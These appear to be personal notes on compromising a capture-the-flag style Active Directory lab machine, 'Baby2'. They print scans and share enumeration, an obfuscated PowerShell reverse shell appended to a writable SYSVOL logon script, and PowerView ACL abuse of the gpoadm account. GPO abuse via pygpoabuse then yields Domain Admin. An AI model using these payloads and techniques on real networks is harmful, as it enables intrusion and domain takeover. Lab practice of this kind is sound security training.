Baby2
This is not a writeup, just my notes about the machine.
Machine information
Operating System: Windows
Chain: False
Credentials
Carl.Moore
Carl.Moore
rid-bruteforce
domain user
office
office
rid-bruteforce
domain user
✅ Valid Usernames
gpoadm
office
Joan.Jennings
Mohammed.Harris
Harry.Shaw
Carl.Moore
Ryan.Jenkins
Kieran.Mitchell
Nicola.Lamb
Lynda.Bailey
Joel.Hurst
Amelia.Griffiths
library
legacy🔑 Passwords list
Information Gathering
# Nmap 7.94SVN scan initiated Thu Apr 3 20:49:16 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_baby2_tcp_allports -vvv 10.10.68.84
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-04 00:54:42Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51163/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51168/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51183/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51198/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCService Enumeration
DNS
Not vulnerable to DNS Zone Transfer
SMB (enum4linux-ng)
Server allows null session
Server allows guest user access
Read,Write access
homesdirectory.
Username as password brute forcing revealed
Carl.Mooreandofficeas valid credentialsCan read and write in apps, docs, home
LDAP
Allows userenumeration via rid-bruteforcing
Not kerberoasting user
Not asreproasting user
Not information withing the users' description field
Initial enumeration
During the assessment, the tester discovered that the domain user carl.moore has read and write access to the following SMB shares:
\\DC\apps\\DC\docs\\DC\homes
In addition, the user has read-only access at the SMB share level to the NETLOGON and SYSVOL shares:
nxc smb 10.10.68.84 -u Carl.Moore -p 'Carl.Moore' --shares
SMB 10.10.68.84 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.68.84 445 DC [+] baby2.vl\Carl.Moore:Carl.Moore
SMB 10.10.68.84 445 DC [*] Enumerated shares
SMB 10.10.68.84 445 DC Share Permissions Remark
SMB 10.10.68.84 445 DC ----- ----------- ------
SMB 10.10.68.84 445 DC ADMIN$ Remote Admin
SMB 10.10.68.84 445 DC apps READ,WRITE
SMB 10.10.68.84 445 DC C$ Default share
SMB 10.10.68.84 445 DC docs READ,WRITE
SMB 10.10.68.84 445 DC homes READ,WRITE
SMB 10.10.68.84 445 DC IPC$ READ Remote IPC
SMB 10.10.68.84 445 DC NETLOGON READ Logon server share
SMB 10.10.68.84 445 DC SYSVOL READ Logon server share However, further enumeration revealed that the user has write access at the NTFS level to the following file:
\\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbsThis file is executed by domain users during the logon process (as confirmed via BloodHound enumeration or logon script analysis). This creates a high-impact attack vector where an unprivileged domain user can modify the login.vbs file to execute arbitrary code in the context of other domain users, potentially including privileged accounts such as domain administrators.
Reverse Shell via GPO Script
To exploit this misconfiguration, the tester appended the next lines to the script:
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuA
DUALgA0ADgAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzAD
UAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADs
AJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcA
KAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAa
wAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZA
BpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB
5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"Finally, uploaded the file by rewriting original file and wait for the reverse shell.
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (4.7 kb/s) (average 4.7 kb/s)
Lateral movement from Amelia to gpoadmin
During post-compromise enumeration, the tester identified that the user Amelia.Griffiths had the ability to modify gpoadm via the following Active Directory permissions: WriteOwner WriteDACL These permissions allowed the tester to fully take over the gpoadm account and reset its password, thereby achieving lateral movement.
PS C:\temp> Import-Module .\PowerView.ps1
PS C:\temp> Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity Amelia.Griffiths -Verbose
PS C:\temp> Add-DomainObjectAcl -TargetIdentity gpoadm -PrincipalIdentity Amelia.Griffiths -Rights All -Verbose
PS C:\temp> Set-DomainUserPassword -Identity gpoadm -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -VerboseCompromise Domain Controller
Finally the tester compromised an user with possess administration privilege over the GPO in the entire Domain controller that means Compromise domain.
The tester leveraged GPO capabilities to escalate privileges by adding a domain user to the Administrators group on the Domain Controller using pygpoabuse.py.
#Obtain GPO-ID
PS C:\temp> Get-GPO -all
#GPO Abuse tool
❯ python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -dc-ip 10.10.68.84 -gpo-id '6ac1786c-016f-11d2-945f-00c04fb984f9'
SUCCESS:root:ScheduledTask TASK_5cdfc77f created!
[+] ScheduledTask TASK_5cdfc77f created!
#Update the GPO's
PS C:\temp> Gpupdate /forceThe tester authenticated as john (now Domain Admin) and confirmed full control:
❯ nxc smb 10.10.68.84 -u 'john' -p 'H4x00r123..'
SMB 10.10.68.84 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB 10.10.68.84 445 DC [+] baby2.vl\john:H4x00r123.. (Pwn3d!)
Last updated